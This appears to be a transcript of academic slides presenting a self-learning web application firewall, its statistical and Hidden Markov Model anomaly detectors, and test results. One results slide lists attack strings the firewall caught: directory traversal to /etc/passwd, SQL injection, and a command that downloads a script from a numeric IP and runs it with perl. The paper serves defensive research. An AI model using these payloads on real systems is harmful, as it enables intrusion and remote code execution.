Learning Web Application Firewall – Benefits and Caveats

Learning Web Application Firewall – Benefits and Caveats Dariusz Pałka, Pedagogical University of Cracow, dpalka@up.krakow.pl; Marek Zachara, University of Science and Technology (AGH) Cracow, mzachara@agh.edu.pl

Outline • Introduction – why we need extra security mechanisms for Web Applications • Learning Web Application Firewall • Implementation • Learning WAF architecture • Data models used • Results • Summary

Introduction • 72% of interviewed companies had their websites/applications hacked during the preceding 24 months. Most successful attacks happen on the application layer (Barracuda Networks) • Web application vulnerabilities outnumber browser/OS vulnerabilities by ratio 1:10 (Microsoft Security Intelligence Report) • „More than 13% of all reviewed sites can be completely compromised automatically. About 49% of web applications contain vulnerabilities of high risk level (Urgent and Critical) detected during automatic scanning. However, detailed manual and automated assessment by a white box method allows to detect these high risk level vulnerabilities with the probability reaching 80-96%”. (Web Application Security Consortium)

Introduction Unfortunately, governmental websites and applications are no exception. The access details are available for sale on the black market.

(source: blog.imperva.com)

Web Application Architecture

Common Attack Methods Against Web Applications • Script injections (especially SQL Injections) • Parameter tampering • Forceful browsing • Cross-site scripting

Security Levels

Rule-based Web Application Firewalls • Problems (disadvantages) • Difficulties in configuring a WAF • Duplication of protection rules • Constant adjustment of WAF rules

Learning Web Application Firewall Black Box WAF

Learning Patterns • Triggered (supervised) learning (TL) • Benefits: • No need to consider the data retention period size. • No need to store all historical data. • Resistant to attacks targeting its learning process. • Drawbacks: • The learning process must be completed • A WAF must be manually re-trained after changes in the protected application

Learning Patterns • Continuous (unsupervised) learning (CL) • A WAF will only accept parameter values that match recent users' behavior patterns • The firewall may be susceptible to specially engineered attacks that target its learning process

Implementation • The WAF is implemented as an Apache Server module • It analyses incoming POST and GET parameters • Data analysis is conducted on the basis of a multi-model approach, similar to the one presented by Giovanni Vigna (University of California) and Christopher Kruegel (Technical University Vienna)

WAF Architecture (diagram; labels shown: Server, Client, Req. processing, CORE_IN, SSL_IN, Request Data Validator, HTTP_IN, Data Validator, Data Collector, Model Generator, Data Decryptor / Encryptor, Req. Data Store, Data Models)

Length of Parameter Values Some attack attempts, such as cross-site scripting, directory traversal and buffer overflow, contain long character sequences, which might significantly exceed the number of characters in legitimate requests, and this feature allows for their easy detection.

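Length of Parameter Values • Chebyshev's inequality: $P(|x - E(x)| \ge t) \le \frac{\operatorname{var}(x)}{t^2}$ where: E(x) – expected value of x, var(x) – variance of x • If: $x = l$ (length of parameter value) and $t = |l_{obs} - E(l)|$, where: $l_{obs}$ – currently observed parameter value length • We obtain: $P(|l - E(l)| \ge |l_{obs} - E(l)|) \le \frac{\operatorname{var}(l)}{(l_{obs} - E(l))^2}$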
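The length check can be sketched as follows. This is a minimal illustration, assuming the expected value and variance are estimated from a learning set of legitimate parameter lengths; the function name `length_anomaly_bound` and the sample lengths are hypothetical and not taken from the authors' module.

```python
from statistics import fmean, pvariance


def length_anomaly_bound(training_lengths, observed_length):
    """Chebyshev upper bound on the probability that a legitimate value
    deviates from the mean length at least as much as the observed one."""
    mean = fmean(training_lengths)
    var = pvariance(training_lengths, mu=mean)
    deviation = abs(observed_length - mean)
    if deviation == 0:
        # The observed length equals the mean: the bound is trivially 1.
        return 1.0
    # var / t^2 can exceed 1 for small deviations, so clamp it to 1.
    return min(1.0, var / deviation ** 2)


# Hypothetical learning set: lengths of legitimate values of one parameter.
lengths = [14, 15, 16, 15, 14, 16, 15, 15]
print(length_anomaly_bound(lengths, 16))   # close to the mean: high bound
print(length_anomaly_bound(lengths, 120))  # far from the mean: very low bound
```

A low bound marks the observed length as unlikely for a legitimate request. When the variance of the learning set is large, the bound stays high even for long values, so such a parameter gives little protection through this model alone.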

Length of Parameter Values (four example parameters)
• E(l) = 14.97, var(l) = 6.25
• E(l) = 15.06, var(l) = 5.99
• E(l) = 17.71, var(l) = 124.66
• E(l) = 15.15, var(l) = 13.02

Length of Parameter Values If … and …, attacks cannot be detected

Belonging to Predefined Classes
Examples of classes of parameter values defined with the use of regular expressions:
• A whole number with or without a sign (e.g. 123, +56, -78): ^[+-]?(0)|([1-9]\d*)$
• A dot-separated real number (e.g. 123, 12.3, .3): ^([0-9]+\.[0-9]*)|([0-9]*\.[0-9]+)|([0-9]+)$
• A comma-separated real number: ^([0-9]+,[0-9]*)|([0-9]*,[0-9]+)|([0-9]+)$
• An email address (e.g. somebody@example.org): ^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$
• The US currency (e.g. $0.59, $1050, $2,596.99): ^\$(\d{1,3}(\,\d{3})*|(\d+))(\.\d{2})?$
• Http(s) URL (e.g. http://example.org, https://example.org/test/abc): ^https?\://[a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,3}(/\S*)*$
• One word: ^[a-zA-Z]+$
• A simple text: ^[a-zA-Z0-9.!?,;”’- \t\n]+$
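A few of these classes can be tried out with Python's `re` module. The sketch below is illustrative only: the class names and the `matching_classes` helper are hypothetical, each alternation is wrapped in a non-capturing group so that the anchors apply to every branch (an adjustment made here, not part of the slide), and the email pattern is assumed to be case-insensitive.

```python
import re

# Patterns adapted from the slide. Anchors are kept, and fullmatch() is used
# so that a trailing newline cannot slip past "$".
CLASSES = {
    "integer": re.compile(r"^[+-]?(?:0|[1-9]\d*)$"),
    "dot_real": re.compile(r"^(?:[0-9]+\.[0-9]*|[0-9]*\.[0-9]+|[0-9]+)$"),
    # Assumption: the upper-case-only character classes imply a
    # case-insensitive match.
    "email": re.compile(r"^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$", re.IGNORECASE),
    "us_currency": re.compile(r"^\$(?:\d{1,3}(?:,\d{3})*|\d+)(?:\.\d{2})?$"),
    "word": re.compile(r"^[a-zA-Z]+$"),
}


def matching_classes(value):
    """Return the names of all classes the value belongs to."""
    return [name for name, pattern in CLASSES.items() if pattern.fullmatch(value)]


for sample in ["123", "+56", ".3", "somebody@example.org", "$2,596.99",
               "../../etc/passwd"]:
    print(repr(sample), matching_classes(sample))
```

A value may belong to several classes at once (for example, `123` is both an integer and a dot-separated real number), while a typical attack string belongs to none of them.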

Belonging to Predefined Classes • Learning • If all values from a learning set belong to the k-th regular expression class, this class is added to set C (parameter constraints set) • Testing • The observed value is tested to see whether it belongs to the classes; i is the number of classes (from set C) to which the observed value belongs
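The learning and testing steps for this model can be sketched as below. This is a hedged illustration: the three classes, the helper names `learn_constraints` and `count_matching`, and the sample values are hypothetical, and how the count i is converted into a probability is not shown because the transcript does not preserve that formula.

```python
import re

# A small, illustrative subset of predefined classes.
CLASSES = {
    "integer": re.compile(r"[+-]?(?:0|[1-9]\d*)"),
    "dot_real": re.compile(r"[0-9]+\.[0-9]*|[0-9]*\.[0-9]+|[0-9]+"),
    "word": re.compile(r"[a-zA-Z]+"),
}


def learn_constraints(learning_values):
    """Learning: return set C, the classes that every learning value belongs to."""
    if not learning_values:
        # Assumption: with no learning data, no class is treated as a constraint.
        return set()
    return {
        name
        for name, pattern in CLASSES.items()
        if all(pattern.fullmatch(value) for value in learning_values)
    }


def count_matching(constraints, observed):
    """Testing: return i, the number of classes in C the observed value belongs to."""
    return sum(1 for name in constraints if CLASSES[name].fullmatch(observed))


C = learn_constraints(["12", "7", "305"])
print(sorted(C))
print(count_matching(C, "42"))        # belongs to every class in C
print(count_matching(C, "' or 1=1"))  # belongs to none of them
```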

The Character Distribution • For every character in parameter values (from a learning set) we calculate an expected value of relative frequency and a variance of relative frequencies • relative character frequency in the i-th parameter value = (number of occurrences of the character in the i-th parameter value) / (length of the i-th parameter value)
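The learning step for this model can be sketched as follows. It is a minimal illustration under two assumptions that the slide does not state: a character that is absent from a value counts with relative frequency 0 for that value, and the population variance is used. The function names and sample values are hypothetical.

```python
from collections import Counter
from statistics import fmean, pvariance


def relative_frequencies(value):
    """Relative frequency of each character within a single parameter value."""
    counts = Counter(value)
    return {ch: n / len(value) for ch, n in counts.items()}


def learn_character_model(learning_values):
    """Map each character to (expected relative frequency, variance)."""
    # Empty values carry no frequency information and are skipped.
    per_value = [relative_frequencies(v) for v in learning_values if v]
    alphabet = set().union(*per_value)
    model = {}
    for ch in alphabet:
        # Assumption: a character missing from a value has frequency 0 there.
        freqs = [freq.get(ch, 0.0) for freq in per_value]
        mean = fmean(freqs)
        model[ch] = (mean, pvariance(freqs, mu=mean))
    return model


model = learn_character_model(["aab", "ab"])
for ch, (mean, var) in sorted(model.items()):
    print(ch, round(mean, 4), round(var, 4))
```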

The Character Distribution

The Character Distribution • Testing • for every character:

Parameter Structural Inference • Structural inference may help if the simple models described earlier are not sufficient • In this approach the structure of legitimate parameter values is modelled as a regular language • We use a Hidden Markov Model to describe this regular language

Ergodic HMM

Parameter Structural Inference • Definitions • $O^{(k)} = O^{(k)}_1 O^{(k)}_2 \dots O^{(k)}_N$ – k-th observation sequence • λ = (A,B,π) – HMM model • Learning - adjusting the model parameters λ to maximize the likelihood of the observation sequences • Baum-Welch algorithm (finds a local maximum of the likelihood function) • Generating k HMMs with a number of states from 2 to sqrt(N), where N is the number of characters in the longest observation sequence • A, B and π matrices are randomly initialised • The HMM with max(

Parameter Structural Inference • Testing • $O_{obs} = O_1 O_2 \dots O_N$ – observation sequence (from incoming requests) • Calculate $P(O_{obs}|\lambda)$ using the Forward-Backward Procedure
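The probability of an observation sequence under a given HMM can be computed with the forward pass of the Forward-Backward procedure; the backward pass is not needed for this quantity. The sketch below is a plain-Python illustration with a hypothetical two-state model, not the authors' implementation, and it omits the scaling or log-space arithmetic that long sequences would require.

```python
def forward_probability(observations, A, B, pi):
    """Return P(O | model) for a discrete HMM given as (A, B, pi).

    A[i][j]: probability of moving from state i to state j
    B[i]:    dict mapping a symbol to its emission probability in state i
    pi[i]:   probability of starting in state i
    """
    if not observations:
        raise ValueError("observation sequence must not be empty")
    n_states = len(pi)
    # Initialisation: start in state i and emit the first symbol.
    alpha = [pi[i] * B[i].get(observations[0], 0.0) for i in range(n_states)]
    # Induction: extend every partial path by one transition and one emission.
    for symbol in observations[1:]:
        alpha = [
            sum(alpha[i] * A[i][j] for i in range(n_states)) * B[j].get(symbol, 0.0)
            for j in range(n_states)
        ]
    # Termination: sum over all states the sequence may end in.
    return sum(alpha)


# Hypothetical toy model: state 0 emits "a", state 1 emits "b".
pi = [1.0, 0.0]
A = [[0.5, 0.5],
     [0.0, 1.0]]
B = [{"a": 1.0}, {"b": 1.0}]

print(forward_probability("ab", A, B, pi))
print(forward_probability("aab", A, B, pi))
print(forward_probability("ba", A, B, pi))  # structure never seen by this model
```

A sequence whose structure the model cannot generate receives probability 0, which is what makes the value usable as an indicator of anomalous parameter structure.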

Anomaly Detection • After defining particular models, we can determine the anomaly score for an observed parameter value, where: … - probability of an observed parameter value for a given model m, n – number of models

Results • Dataset • 3 independent production Web Servers • 10 web applications in total • 3853 parameters analysed, with 527070 values in total • Attack queries • 73 queries collected from our Web Servers • 12 queries selected from the „HTTP-delivered attacks against web servers” database (http://www.i-pi.com/HTTP-attacks-JoCN-2006/)

Results

Types of Attacks Found by WAF
Examples of attack attempts found by our Learning WAF (in parameter values):
• ../../../../../../../../../../../../../../../../../../../../../../../etc/passwd (Directory Traversal)
• phpinfo(); (Parameter Tampering)
• ' or 1=1 – (SQL Injection)
• //phpMyAdmin2/config/config.inc.php (Forceful Browsing)
• /../../winnt/system32/logfiles/w3svc1/ex000121.log
• cd /tmp;rm -rf font-nix;wget 67.58.79.162/font-nix;perl font-nix

Summary • Benefits of a Learning WAF • Can be easily extended with new Data Models to improve security • Requires minimal configuration effort • Can be a supplement for existing security systems • Still TO DO… • Add data models that take into consideration correlations between parameters in a request (rather than treating each parameter in isolation) • Improve structural inference (the B-W algorithm in its current form is time-consuming, which may be a problem in production environments with high traffic) • Improve support for a request context (e.g. try to detect and utilise session IDs)

THANK YOU
